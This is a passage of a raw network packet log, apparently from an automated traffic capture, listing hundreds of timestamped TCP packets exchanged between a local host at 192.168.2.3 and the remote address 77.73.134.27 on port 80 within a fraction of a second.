                                                                                    Feb 7, 2023 19:44:56.030195951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030206919 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030225992 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030225992 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030256033 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030261040 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030280113 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030284882 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030316114 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030320883 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030339003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030344009 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030361891 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030374050 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030405045 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030406952 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030427933 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030435085 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030463934 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030466080 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030497074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030499935 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030519009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030527115 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030556917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030558109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030577898 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030586004 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030612946 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030615091 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030632019 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030648947 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030678034 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030713081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030713081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030724049 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030738115 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030755043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030786991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030813932 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030826092 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030841112 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030870914 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030873060 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030899048 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030900955 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030929089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030935049 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030957937 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.030962944 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030982018 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.030987978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031018972 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031027079 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031047106 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031054020 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031076908 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031078100 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031095982 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031106949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031136990 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031141043 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031161070 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031167030 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031197071 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031198978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031229019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031245947 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031267881 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031267881 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031300068 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031305075 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031325102 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031331062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031359911 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031378031 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031388998 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031399965 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031418085 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031438112 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031449080 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031459093 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031478882 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031480074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031501055 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031512022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031539917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031553984 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031569958 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031574965 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031599045 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031600952 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031621933 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031629086 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031661034 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031676054 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031688929 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031694889 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031717062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031718969 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031749010 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031750917 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031769037 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031779051 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031809092 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031812906 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031833887 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031838894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031867981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031869888 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031891108 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031899929 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031914949 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031930923 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031959057 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.031961918 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031982899 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.031987906 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032006025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032020092 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032047033 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032047987 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032068014 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032078981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032104969 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032109976 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032126904 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032141924 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032164097 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032172918 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032198906 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032202959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032218933 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032233000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032253027 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032263994 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032294035 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032295942 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032321930 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032351971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032366037 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032380104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032390118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032390118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032409906 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032413006 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032428980 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032440901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032468081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032469988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032495975 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032500982 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032521009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032531023 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032562017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032563925 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032586098 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032593966 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032618046 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032625914 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032643080 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032659054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032685041 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032687902 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032712936 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032717943 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032740116 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032747984 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032778025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032779932 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032804966 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032809973 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032835960 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032840967 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032869101 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032881021 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032905102 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032912016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032929897 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032943010 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032963037 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.032974005 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.032994032 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033004999 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033025980 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033035994 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033056021 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033066988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033092022 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033096075 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033119917 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033128023 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033147097 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033158064 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033179998 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033189058 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033211946 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033221006 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033238888 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033252001 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033272028 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033281088 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033303022 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033312082 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033329964 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033343077 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033361912 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033371925 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033394098 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033402920 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033422947 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033435106 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033462048 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033477068 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033497095 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033508062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033526897 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033539057 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033555031 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033569098 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033585072 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033598900 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033618927 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033627033 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033662081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033674955 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033694029 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033706903 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033729076 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033736944 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033761024 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033766985 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033790112 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033798933 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033821106 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033828974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033852100 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033859015 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033881903 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033889055 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033910036 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033921957 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033941031 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033952951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.033973932 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.033982992 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034008980 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034014940 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034038067 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034045935 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034065962 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034077883 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034099102 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034110069 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034132957 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034142017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034164906 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034171104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034193039 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034202099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034224987 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034231901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034250975 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034264088 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034281969 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034295082 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034312963 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034326077 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034348011 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034358978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034375906 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034389973 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034410000 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034420013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034440994 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034450054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034471989 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034482002 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034501076 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034512043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034534931 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034540892 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034559965 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034573078 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034600019 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034604073 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034624100 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034636021 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034657955 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034666061 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034684896 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034714937 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034720898 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034745932 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034770966 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034776926 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034796953 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034807920 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034830093 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034837961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034858942 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034867048 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034888029 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034897089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034924030 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034928083 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034949064 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034956932 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.034979105 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.034987926 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035007954 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035020113 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035042048 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035049915 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035068989 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035080910 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035104036 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035110950 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035131931 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035142899 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035166025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035172939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035195112 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035203934 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035223961 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035235882 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035254955 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035269022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035289049 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035300016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035322905 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.035330057 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.035352945 CET4969880192.168.2.377.73.134.27
